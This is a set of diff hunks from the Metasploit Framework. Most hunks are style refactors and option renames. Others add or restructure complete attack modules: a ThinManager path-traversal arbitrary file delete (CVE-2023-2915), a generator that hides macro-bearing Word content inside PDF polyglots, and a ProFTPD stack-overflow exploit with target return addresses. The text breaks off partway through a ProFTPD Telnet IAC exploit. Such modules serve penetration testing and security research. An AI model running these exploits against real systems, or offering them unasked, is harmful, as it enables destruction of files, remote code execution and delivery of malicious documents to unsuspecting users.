-    deregister_options('CERT_TEMPLATE', 'ALT_DNS', 'ALT_UPN', 'PFX', 'ON_BEHALF_OF', 'SMBUser', 'SMBPass', 'SMBDomain')
+    deregister_options('CERT_TEMPLATE', 'ALT_DNS', 'ALT_UPN', 'PFX', 'ON_BEHALF_OF', 'SMBUser', 'SMBPass', 'SMBDomain', 'LDAPUsername', 'LDAPPassword', 'LDAPDomain')
  end

  def run
@@ -170,10 +170,10 @@ class MetasploitModule < Msf::Auxiliary
      end
      opts = {
        tree: tree,
-        computer_name: computer_info&.name
+        account_name: computer_info&.name
      }
      begin
-        delete_account(opts) if opts[:tree] && opts[:computer_name]
+        delete_account(opts) if opts[:tree] && opts[:account_name]
      rescue MsSamrUnknownError => e
        print_warning("Unable to delete the computer account, this will have to be done manually with an Administrator account (#{e.message})")
      end
@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ThinManager Path Traversal (CVE-2023-2915) Arbitrary File Delete',
+        'Description' => %q{
+          This module exploits a path traversal vulnerability (CVE-2023-2915) in
+          ThinManager <= v13.1.0 to delete arbitrary files from the system.
+          The affected service listens by default on TCP port 2031 and runs in the
+          context of NT AUTHORITY\SYSTEM.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Tenable' # Discovery and PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-2915'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2023-28'],
+          ['URL', 'https://support.rockwellautomation.com/app/answers/answer_view/a_id/1140471']
+        ],
+        'DisclosureDate' => '2023-08-17',
+        'DefaultOptions' => {
+          'RPORT' => 2031,
+          'SSL' => 'False'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILE', [false, 'The file to delete from the target system.', '/tmp/foo.txt']),
+        OptInt.new('DEPTH', [ true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 7 ])
+      ]
+    )
+  end
+
+  def check
+    begin
+      connect
+    rescue Rex::ConnectionTimeout
+      print_error("Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed.")
+      return Exploit::CheckCode::Unknown
+    end
+
+    vprint_status('Sending handshake...')
+    handshake = [0x100].pack('V')
+    vprint_status(Rex::Text.to_hex_dump(handshake))
+    sock.put(handshake)
+
+    res = sock.get_once(4096, 5)
+    expected_header = "\x00\x04\x00\x01\x00\x00\x00\x08".b
+
+    if res&.start_with?(expected_header)
+      vprint_status('Received handshake response.')
+      vprint_status(Rex::Text.to_hex_dump(res))
+      disconnect
+      return Exploit::CheckCode::Detected
+    elsif res
+      vprint_status('Received unexpected handshake response:')
+      vprint_status(Rex::Text.to_hex_dump(res))
+      disconnect
+      return Exploit::CheckCode::Safe
+    else
+      disconnect
+      return Exploit::CheckCode::Unknown('No handshake response received.')
+    end
+  end
+
+  def mk_msg(msg_type, flags, data)
+    dlen = data.length
+    hdr = [msg_type, flags, dlen].pack('nnN')
+    hdr + data
+  end
+
+  def run
+    print_status('Sending handshake...')
+
+    begin
+      connect
+    rescue Rex::ConnectionTimeout => e
+      fail_with(Failure::Unreachable, "Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed: #{e.message}")
+    end
+
+    handshake = [0x100].pack('V')
+    vprint_status(Rex::Text.to_hex_dump(handshake))
+
+    begin
+      sock.put(handshake)
+    rescue StandardError => e
+      fail_with(Failure::UnexpectedReply, "Failed during handshake send: #{e.class} - #{e.message}")
+    end
+
+    res = sock.get
+    if res
+      print_status('Received handshake response.')
+      vprint_status(Rex::Text.to_hex_dump(res))
+    else
+      print_error('No handshake response received.')
+      fail_with(Failure::Unreachable, "Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed.")
+    end
+
+    begin
+      fname = datastore['FILE']
+      traversal = '../' * 7
+      full_fname = traversal + fname
+      full_fname = full_fname.gsub(%r{/+}, '/')
+
+      data = [0xaa].pack('N')
+      data << "unk_str1\x00"
+      data << [1].pack('N')
+      data << full_fname.encode('ASCII') + "\x00"
+
+      req = mk_msg(21, 0x0021, data)
+    rescue StandardError => e
+      fail_with(Failure::BadConfig, "Failed to construct request: #{e.class} - #{e.message}")
+    end
+
+    vprint_status(Rex::Text.to_hex_dump(req))
+
+    print_status("Deleting #{fname} from #{datastore['RHOSTS']}")
+    sock.put(req)
+
+    begin
+      res = sock.get
+      if res
+        print_good('Received response from target.')
+        vprint_status(Rex::Text.to_hex_dump(res)) if res
+      else
+        print_error('No response received from target.')
+      end
+    rescue StandardError => e
+      fail_with(Failure::TimeoutExpired, "Failed to receive response: #{e.class} - #{e.message}")
+    ensure
+      disconnect
+    end
+  end
+end
@@ -14,9 +14,10 @@ class MetasploitModule < Msf::Auxiliary
        info,
        'Name' => 'ThinManager Path Traversal (CVE-2023-27855) Arbitrary File Upload',
        'Description' => %q{
-          This module exploits a path traversal vulnerability (CVE-2023-27855 ) in ThinManager <= v13.0.1 to upload arbitrary files to the target system.
-
-          The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+          This module exploits a path traversal vulnerability (CVE-2023-27855) in
+          ThinManager <= v13.0.1 to upload arbitrary files to the target system.
+          The affected service listens by default on TCP port 2031 and runs in the
+          context of NT AUTHORITY\SYSTEM.
        },
        'Author' => [
          'Michael Heinzl', # MSF Module
@@ -24,7 +25,7 @@ class MetasploitModule < Msf::Auxiliary
        ],
        'License' => MSF_LICENSE,
        'References' => [
-          ['CVE', '2023-27855 '],
+          ['CVE', '2023-27855'],
          ['URL', 'https://www.tenable.com/security/research/tra-2023-13'],
          ['URL', 'https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1138640']
        ],
@@ -14,9 +14,10 @@ class MetasploitModule < Msf::Auxiliary
        info,
        'Name' => 'ThinManager Path Traversal (CVE-2023-2917) Arbitrary File Upload',
        'Description' => %q{
-          This module exploits a path traversal vulnerability (CVE-2023-2917) in ThinManager <= v13.1.0 to upload arbitrary files to the target system.
-
-          The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+          This module exploits a path traversal vulnerability (CVE-2023-2917) in
+          ThinManager <= v13.1.0 to upload arbitrary files to the target system.
+          The affected service listens by default on TCP port 2031 and runs in the
+          context of NT AUTHORITY\SYSTEM.
        },
        'Author' => [
          'Michael Heinzl', # MSF Module
@@ -24,7 +25,7 @@ class MetasploitModule < Msf::Auxiliary
        ],
        'License' => MSF_LICENSE,
        'References' => [
-          ['CVE', '2023-2917 '],
+          ['CVE', '2023-2917'],
          ['URL', 'https://www.tenable.com/security/research/tra-2023-28'],
          ['URL', 'https://support.rockwellautomation.com/app/answers/answer_view/a_id/1140471']
        ],
@@ -0,0 +1,216 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Maldoc in PDF Polyglot converter',
+        'Description' => %q{
+          A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
+          structure of PDF.
+
+          If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.
+
+          The attack does not bypass configured macro locks. And the malicious macros are also not executed when the
+          file is opened in PDF readers or similar software.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'mekhalleh (RAMELLA Sebastien)' # module author powered by EXA Reunion (https://www.exa.re/)
+        ],
+        'Platform' => ['win'],
+        'References' => [
+          ['URL', 'https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html'],
+          ['URL', 'https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/'],
+          ['URL', 'https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/'],
+          ['URL', 'https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPath.new('FILENAME', [true, 'The input MHT filename with macro embedded']),
+        OptPath.new('INJECTED_PDF', [false, 'The input PDF filename to inject in (optional)']),
+        OptString.new('MESSAGE_PDF', [false, 'The message to display in the local PDF template (if INJECTED_PDF is NOT used)', 'You must open this document in Microsoft Word']),
+        OptEnum.new('OUTPUT_EXT', [true, 'The output file extension', '.doc', ['.doc', '.rtf']])
+      ]
+    )
+  end
+
+  def create_pdf(mht)
+    pdf = ''
+    pdf << "#{rand_pdfheader}\r\n"
+
+    # item 1 (catalog)
+    pdf << "1 0 obj\r\n"
+    pdf << "<< /Type /Catalog /Pages 2 0 R >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 2 (pages)
+    pdf << "2 0 obj\r\n"
+    pdf << "<< /Type /Pages /Kids [3 0 R] /Count 1 >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 3 (page with resources)
+    pdf << "3 0 obj\r\n"
+    pdf << "<< /Type /Page /Parent 2 0 R /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 612 792] /Contents 4 0 R >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 4 (content)
+    content = "BT /F1 12 Tf 100 700 Td (#{datastore['MESSAGE_PDF']}) Tj ET\r\n"
+    pdf << "4 0 obj\r\n"
+    # exact stream length
+    pdf << "<< /Length #{content.length} >>\r\n"
+    pdf << "stream\r\n"
+    pdf << content
+    pdf << "endstream\r\n"
+    pdf << "endobj\r\n"
+
+    # item 5 (helvetica font)
+    pdf << "5 0 obj\r\n"
+    pdf << "<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 6 (MHT content)
+    pdf << "6 0 obj\r\n"
+    pdf << "<< /Length #{mht.length} >>\r\n"
+    pdf << "stream\r\n"
+    pdf << mht
+    pdf << "\r\nendstream\r\n"
+    pdf << "endobj\r\n"
+
+    # calculation of dynamic offsets
+    offsets = []
+    offsets << 0
+    for i in 1..6 do
+      offsets << pdf.index("#{i} 0 obj")
+    end
+
+    # XREF section
+    xref_start = pdf.length
+    pdf << "xref\r\n"
+    # update for 7 objects (0-6)
+    pdf << "0 7\r\n"
+    pdf << "0000000000 65535 f\r\n"
+    offsets[1..].each do |offset|
+      pdf << format("%010d 00000 n\r\n", offset)
+    end
+
+    # trailer
+    pdf << "trailer\r\n"
+    # update for 7 objects (0-6)
+    pdf << "<< /Size 7 /Root 1 0 R >>\r\n"
+    pdf << "startxref\r\n"
+    pdf << "#{xref_start}\r\n"
+    pdf << "%%EOF\r\n"
+
+    # saving the file
+    ltype = "auxiliary.fileformat.#{shortname}"
+    fname = File.basename(datastore['FILENAME'], '*') + datastore['OUTPUT_EXT']
+    path = store_local(ltype, nil, pdf, fname)
+
+    print_good("The file '#{fname}' is stored at '#{path}'")
+  end
+
+  def inject_pdf(pdf_path, mht)
+    # read PDF in binary mode
+    pdf_data = File.binread(pdf_path)
+    vprint_status("PDF data length: #{pdf_data.length}")
+
+    # find the position of 'startxref'
+    startxref_index = pdf_data.rindex('startxref')
+    unless startxref_index
+      fail_with(Failure::Unknown, 'Invalid PDF: \'startxref\' not found')
+    end
+
+    xref_start_value = pdf_data[startxref_index..].match(/startxref\r?\n(\d+)/)[1].to_i
+    vprint_status("PDF startxref value: #{xref_start_value}")
+    vprint_status("PDF startxref position: #{startxref_index}")
+
+    # extract the original objects
+    original_objects = pdf_data[0...startxref_index]
+
+    # build the MHT object as the first object (0 0 obj)
+    mht_object = ''
+    mht_object << "0 0 obj\r\n"
+    mht_object << "<< /Length #{mht.length} >>\r\n"
+    mht_object << "stream\r\n"
+    mht_object << mht
+    mht_object << "\r\nendstream\r\n"
+    mht_object << "endobj\r\n"
+
+    # combine: MHT first, then original items
+    updated_objects = mht_object + original_objects
+
+    # calculate offsets for XREF section
+    offsets = []
+    updated_objects.scan(/(\d+) 0 obj/) do |match|
+      offsets << updated_objects.index("#{match[0]} 0 obj")
+    end
+
+    # build the XREF section
+    xref = "xref\r\n"
+    # includes free entry (0) and items
+    xref << "0 #{offsets.size + 1}\r\n"
+    # free entry
+    xref << "0000000000 65535 f\r\n"
+    offsets.each do |offset|
+      xref << format("%010d 00000 n\r\n", offset)
+    end
+
+    # build the trailer
+    xref_start_new = updated_objects.length
+    trailer = "trailer\r\n"
+    trailer << "<< /Size #{offsets.size + 1} /Root 1 0 R >>\r\n"
+    trailer << "startxref\r\n"
+    trailer << "#{xref_start_new}\r\n"
+    trailer << "%%EOF\r\n"
+
+    # assemble the final PDF
+    headers = "#{rand_pdfheader}\r\n"
+    pdf = headers + updated_objects + xref + trailer
+
+    # saving the file
+    ltype = "auxiliary.fileformat.#{shortname}"
+    fname = File.basename(datastore['FILENAME'], '*') + datastore['OUTPUT_EXT']
+    path = store_local(ltype, nil, pdf, fname)
+
+    print_good("The file '#{fname}' is stored at '#{path}'")
+  end
+
+  def rand_pdfheader
+    selected_version = ['1.0', '1.1', '1.2', '1.3', '1.4', '1.5', '1.6', '1.7', '2.0'].sample
+
+    "%PDF-#{selected_version}"
+  end
+
+  def run
+    content = File.read(datastore['FILENAME'])
+    fail_with(Failure::BadConfig, 'The MHT file content is empty') if content&.empty?
+
+    # if no pdf injected is provided, create new PDF from template
+    if datastore['INJECTED_PDF'].blank?
+      print_status('INJECTED_PDF not provided, creating the PDF from scratch')
+      fail_with(Failure::BadConfig, 'No MESSAGE_PDF provided') if datastore['MESSAGE_PDF'].blank?
+
+      create_pdf(content)
+    else
+      print_status("PDF creation using '#{File.basename(datastore['INJECTED_PDF'])}' as template")
+
+      inject_pdf(datastore['INJECTED_PDF'], content)
+    end
+  end
+
+end
@@ -14,9 +14,10 @@ class MetasploitModule < Msf::Auxiliary
        info,
        'Name' => 'ThinManager Path Traversal (CVE-2023-27856) Arbitrary File Download',
        'Description' => %q{
-          This module exploits a path traversal vulnerability (CVE-2023-27856) in ThinManager <= v13.0.1 to retrieve arbitrary files from the system.
-
-          The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+          This module exploits a path traversal vulnerability (CVE-2023-27856) in
+          ThinManager <= v13.0.1 to retrieve arbitrary files from the system.
+          The affected service listens by default on TCP port 2031 and runs in the
+          context of NT AUTHORITY\SYSTEM.
        },
        'Author' => [
          'Michael Heinzl', # MSF Module
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
          the vmdir service in VMware vCenter Server version 6.7 prior to the
          6.7U3f update, only if upgraded from a previous release line, such as
          6.0 or 6.5.
-          If the bind username and password are provided (BIND_DN and BIND_PW
+          If the bind username and password are provided (BIND_DN and LDAPPassword
          options), these credentials will be used instead of attempting an
          anonymous bind.
        },
@@ -91,20 +91,27 @@ class MetasploitModule < Msf::Auxiliary

      # Look for an entry with a non-empty vmwSTSPrivateKey attribute
      unless entries&.find { |entry| entry[:vmwstsprivatekey].any? }
-        print_error("#{ldap.peerinfo} is NOT vulnerable to CVE-2020-3952") unless datastore['BIND_PW'].present?
+        print_error("#{ldap.peerinfo} is NOT vulnerable to CVE-2020-3952") unless datastore['LDAPPassword'].present?
        print_error('Dump failed')
        return Exploit::CheckCode::Safe
      end

-      print_good("#{ldap.peerinfo} is vulnerable to CVE-2020-3952") unless datastore['BIND_PW'].present?
+      print_good("#{ldap.peerinfo} is vulnerable to CVE-2020-3952") unless datastore['LDAPPassword'].present?
      pillage(entries)

      # HACK: Stash discovered base DN in CheckCode reason
      Exploit::CheckCode::Vulnerable(base_dn)
    end
+  rescue Errno::ECONNRESET
+    fail_with(Failure::Disconnected, 'The connection was reset.')
+  rescue Rex::ConnectionError => e
+    fail_with(Failure::Unreachable, e.message)
+  rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
+    fail_with(Failure::NoAccess, e.message)
+  rescue Rex::Proto::LDAP::LdapException => e
+    fail_with(Failure::NoAccess, e.message)
  rescue Net::LDAP::Error => e
-    print_error("#{e.class}: #{e.message}")
-    Exploit::CheckCode::Unknown
+    fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
  end

  def pillage(entries)
@@ -327,7 +327,7 @@ class MetasploitModule < Msf::Auxiliary
            port: rport,
            proto: 'tcp',
            ntype: 'fingerprint.match',
-            data: { :finger_print => nd_fingerprint_match }
+            data: nd_fingerprint_match
          )
        elsif smb1_fingerprint['native_os'] || smb1_fingerprint['native_lm']
          desc = "#{smb1_fingerprint['native_os']} (#{smb1_fingerprint['native_lm']})"
@@ -352,7 +352,7 @@ class MetasploitModule < Msf::Auxiliary
          port: rport,
          proto: 'tcp',
          ntype: 'smb.fingerprint',
-          data: { :finger_print => nd_smb_fingerprint }
+          data: nd_smb_fingerprint
        )

        disconnect
@@ -30,9 +30,10 @@ class MetasploitModule < Msf::Exploit::Remote
        },
        'License' => MSF_LICENSE,
        'Author' => [
-          'Andre Moulu', # discovery, advisory, and exploitation help
-          'jduck', # msf module
-          'joev'   # msf module
+          'Andre Moulu',       # discovery, advisory, and exploitation help
+          'Elliot Alderson',   # Mr. Robot easter-egg
+          'jduck',             # msf module
+          'joev'               # msf module
        ],
        'References' => [
          ['URL', 'https://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x83\xec\x7f",
-          'DisableNops' => 'True'
+          'DisableNops' => true
        },
        'Platform' => 'bsd',
        'Arch' => ARCH_X86,
@@ -9,47 +9,47 @@ class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)',
+        'Description' => %q{
          This module exploits a stack-based buffer overflow in versions 1.2 through
-        1.3.0 of ProFTPD server. The vulnerability is within the "sreplace" function
-        within the "src/support.c" file.
+          1.3.0 of ProFTPD server. The vulnerability is within the "sreplace" function
+          within the "src/support.c" file.

-        The off-by-one heap overflow bug in the ProFTPD sreplace function has been
-        discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit
-        this off-by-one bug via MKD command, but failed. We did not work on this bug
-        since then.
+          The off-by-one heap overflow bug in the ProFTPD sreplace function has been
+          discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit
+          this off-by-one bug via MKD command, but failed. We did not work on this bug
+          since then.

-        Actually, there are exists at least two bugs in sreplace function, one is the
-        mentioned off-by-one heap overflow bug the other is a stack-based buffer overflow
-        via 'sstrncpy(dst,src,negative argument)'.
+          Actually, there are exists at least two bugs in sreplace function, one is the
+          mentioned off-by-one heap overflow bug the other is a stack-based buffer overflow
+          via 'sstrncpy(dst,src,negative argument)'.

-        We were unable to reach the "sreplace" stack bug on ProFTPD 1.2.10 stable
-        version, but the version 1.3.0rc3 introduced some interesting changes, among them:
+          We were unable to reach the "sreplace" stack bug on ProFTPD 1.2.10 stable
+          version, but the version 1.3.0rc3 introduced some interesting changes, among them:

-        1. another (integer) overflow in sreplace!
-        2. now it is possible to reach sreplace stack-based buffer overflow bug via
+          1. another (integer) overflow in sreplace!
+          2. now it is possible to reach sreplace stack-based buffer overflow bug via
          the "pr_display_file" function!
-        3. stupid '.message' file display bug
+          3. stupid '.message' file display bug

-        So we decided to choose ProFTPD 1.3.0 as a target for our exploit.
-        To reach the bug, you need to upload a specially created .message file to a
-        writeable directory, then do "CWD <writeable directory>" to trigger the invocation
-        of sreplace function.
+          So we decided to choose ProFTPD 1.3.0 as a target for our exploit.
+          To reach the bug, you need to upload a specially created .message file to a
+          writeable directory, then do "CWD <writeable directory>" to trigger the invocation
+          of sreplace function.

-        Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'
-        file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.
+          Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'
+          file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.

-        The exploit is a part of VulnDisco Pack since Dec 2005.
-      },
-      'Author'         =>
-        [
-          'Evgeny Legerov <admin[at]gleg.net>',  # original .pm version (VulnDisco)
-          'jduck'   # Metasploit 3.x port
+          The exploit is a part of VulnDisco Pack since Dec 2005.
+        },
+        'Author' => [
+          'Evgeny Legerov <admin[at]gleg.net>', # original .pm version (VulnDisco)
+          'jduck' # Metasploit 3.x port
        ],
-      'References'     =>
-        [
+        'References' => [
          [ 'CVE', '2006-5815' ],
          [ 'OSVDB', '68985' ],
          [ 'BID', '20992' ],
@@ -58,63 +58,69 @@ class MetasploitModule < Msf::Exploit::Remote
          [ 'URL', 'http://bugs.proftpd.org/show_bug.cgi?id=2858' ],
          [ 'URL', 'http://proftp.cvs.sourceforge.net/proftp/proftpd/src/main.c?view=diff&r1=text&tr1=1.292&r2=text&tr2=1.294&diff_format=h' ]
        ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'PrependChrootBreak' => true
        },
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 900,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 900,
          'BadChars' => "\x00\x0a\x0d\x25",
-          'DisableNops'	=>  'True',
+          'DisableNops'	=> true
        },
-      'Platform'       => [ 'linux' ],
-      'Targets'        =>
-      [
-        #
-        # Automatic targeting via fingerprinting
-        #
-        [ 'Automatic Targeting', { 'auto' => true }  ],
+        'Platform' => [ 'linux' ],
+        'Targets' => [
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true } ],
+
+          #
+          # This special one comes first since we dont want its index changing.
+          #
+          [
+            'Debug',
+            {
+              'Ret' => 0x41414242,
+              'PoolAddr' => 0x43434545
+            }
+          ],
+
+          #
+          # specific targets
+          #
+
+          [
+            'ProFTPD 1.3.0 (source install) / Debian 3.1',
+            {
+              # objdump -D proftpd|grep call|grep edx
+              'Ret' => 0x804afc8, # call edx
+              # nm proftpd|grep permanent_pool
+              'PoolAddr' => 0x80b59f8
+            }
+          ]

-        #
-        # This special one comes first since we dont want its index changing.
-        #
-        [	'Debug',
-          {
-            'Ret' => 0x41414242,
-            'PoolAddr' => 0x43434545
-          }
        ],
-
-        #
-        # specific targets
-        #
-
-        [ "ProFTPD 1.3.0 (source install) / Debian 3.1",
-          {
-            # objdump -D proftpd|grep call|grep edx
-            'Ret' => 0x804afc8, # call edx
-            # nm proftpd|grep permanent_pool
-            'PoolAddr' => 0x80b59f8
-          }
-        ]
-
-      ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2006-11-26'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2006-11-26',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [UNRELIABLE_SESSION]
+        }
+      )
+    )

    register_options(
      [
        OptString.new('WRITABLE', [ true, 'A writable directory on the target host', '/incoming' ])
-      ])
+      ]
+    )
  end

-
  def check
    # NOTE: We don't care if the login failed here...
-    ret = connect
+    connect

    # We just want the banner to check against our targets..
    vprint_status("FTP Banner: #{banner.strip}")
@@ -122,9 +128,9 @@ class MetasploitModule < Msf::Exploit::Remote
    status = CheckCode::Safe

    if banner =~ /ProFTPD (1\.[23]\.[^ ])/i
-      ver = $1
-      maj,min,rel = ver.split('.')
-      relv = rel.slice!(0,1)
+      ver = ::Regexp.last_match(1)
+      _maj, _min, rel = ver.split('.')
+      relv = rel.slice!(0, 1)
      case relv
      when '2'
        status = CheckCode::Appears
@@ -132,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
      when '3'
        # 1.3.x before 1.3.1 is vulnerable
        status = CheckCode::Appears
-        if rel.length > 0
+        if !rel.empty?
          if rel.to_i > 0
            status = CheckCode::Safe
          else
@@ -146,34 +152,33 @@ class MetasploitModule < Msf::Exploit::Remote
    return status
  end

-
  def exploit
    connect_login

    # Use a copy of the target
    mytarget = target

-    if (target['auto'])
+    if target['auto']
      mytarget = nil

-      print_status("Automatically detecting the target...")
-      if (banner and (m = banner.match(/ProFTPD (1\.[23]\.[^ ])/i))) then
+      print_status('Automatically detecting the target...')
+      if (banner && (m = banner.match(/ProFTPD (1\.[23]\.[^ ])/i)))
        print_status("FTP Banner: #{banner.strip}")
        version = m[1]
      else
-        fail_with(Failure::NoTarget, "No matching target")
+        fail_with(Failure::NoTarget, 'No matching target')
      end

      regexp = Regexp.escape(version)
-      self.targets.each do |t|
-        if (t.name =~ /#{regexp}/) then
+      targets.each do |t|
+        if (t.name =~ /#{regexp}/)
          mytarget = t
          break
        end
      end

-      if (not mytarget)
-        fail_with(Failure::NoTarget, "No matching target")
+      if !mytarget
+        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected Target: #{mytarget.name}")
@@ -184,31 +189,31 @@ class MetasploitModule < Msf::Exploit::Remote
      end
    end

-    #puts "attach and press any key"; bleh = $stdin.gets
-    res = send_cmd(['CWD', datastore['WRITABLE']])
+    # puts "attach and press any key"; bleh = $stdin.gets
+    send_cmd(['CWD', datastore['WRITABLE']])

    pwd = send_cmd(['PWD'])
-    if pwd !~ /257\s\"(.+)\"/
-      fail_with(Failure::Unknown, "Unable to get current working directory")
+    if pwd !~ /257\s"(.+)"/
+      fail_with(Failure::Unknown, 'Unable to get current working directory')
    end
-    pwd = $1
-    pwd << "/" if pwd[-1,1] != "/"
+    pwd = ::Regexp.last_match(1)
+    pwd << '/' if pwd[-1, 1] != '/'

-    dir1 = "A" * (251 - pwd.length)
-    res = send_cmd(['MKD', dir1])
+    dir1 = 'A' * (251 - pwd.length)
+    send_cmd(['MKD', dir1])

-    res = send_cmd(['CWD', dir1])
+    send_cmd(['CWD', dir1])

-    res = send_cmd(['PWD'])
+    send_cmd(['PWD'])

-    dir2 = "B" * 64
+    dir2 = 'B' * 64
    dir2 << [mytarget.ret].pack('V')
    dir2 << [mytarget['PoolAddr'] - 4].pack('V')
    dir2 << "\xcc" * 28

-    res = send_cmd(['DELE', "#{dir2}/.message"])
-    res = send_cmd(['DELE', "250"])
-    res = send_cmd(['RMD', dir2])
+    send_cmd(['DELE', "#{dir2}/.message"])
+    send_cmd(['DELE', '250'])
+    send_cmd(['RMD', dir2])

    filedata = ''
    filedata << 'A'
@@ -219,14 +224,13 @@ class MetasploitModule < Msf::Exploit::Remote
    filedata << rand_text_alphanumeric(900 - payload.encoded.length)
    filedata << "\x25\x43\x41" * 10

-    res = send_cmd(['MKD', dir2])
-    res = send_cmd_data(['PUT', "#{dir2}/.message"], filedata, 'I')
+    send_cmd(['MKD', dir2])
+    send_cmd_data(['PUT', "#{dir2}/.message"], filedata, 'I')

    # Trigger sreplace overflow
-    res = send_cmd(['CWD', dir2])
+    send_cmd(['CWD', dir2])

    handler
    disconnect
-
  end
 end
@@ -6,269 +6,278 @@
 class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

-  #include Msf::Exploit::Remote::Ftp
+  # include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)',
+        'Description' => %q{
          This module exploits a stack-based buffer overflow in versions of ProFTPD
-        server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
-        large number of Telnet IAC commands, an attacker can corrupt memory and
-        execute arbitrary code.
+          server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
+          large number of Telnet IAC commands, an attacker can corrupt memory and
+          execute arbitrary code.

-        The Debian Squeeze version of the exploit uses a little ROP stub to indirectly
-        transfer the flow of execution to a pool buffer (the cmd_rec "res" in
-        "pr_cmd_read").
+          The Debian Squeeze version of the exploit uses a little ROP stub to indirectly
+          transfer the flow of execution to a pool buffer (the cmd_rec "res" in
+          "pr_cmd_read").

-        The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub
-        to it, and execute the stub. The stub then copies the remainder of the payload
-        in and executes it.
+          The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub
+          to it, and execute the stub. The stub then copies the remainder of the payload
+          in and executes it.

-        NOTE: Most Linux distributions either do not ship a vulnerable version of
-        ProFTPD, or they ship a version compiled with stack smashing protection.
+          NOTE: Most Linux distributions either do not ship a vulnerable version of
+          ProFTPD, or they ship a version compiled with stack smashing protection.

-        Although SSP significantly reduces the probability of a single attempt
-        succeeding, it will not prevent exploitation. Since the daemon forks in a
-        default configuration, the cookie value will remain the same despite
-        some attempts failing. By making repeated requests, an attacker can eventually
-        guess the cookie value and exploit the vulnerability.
+          Although SSP significantly reduces the probability of a single attempt
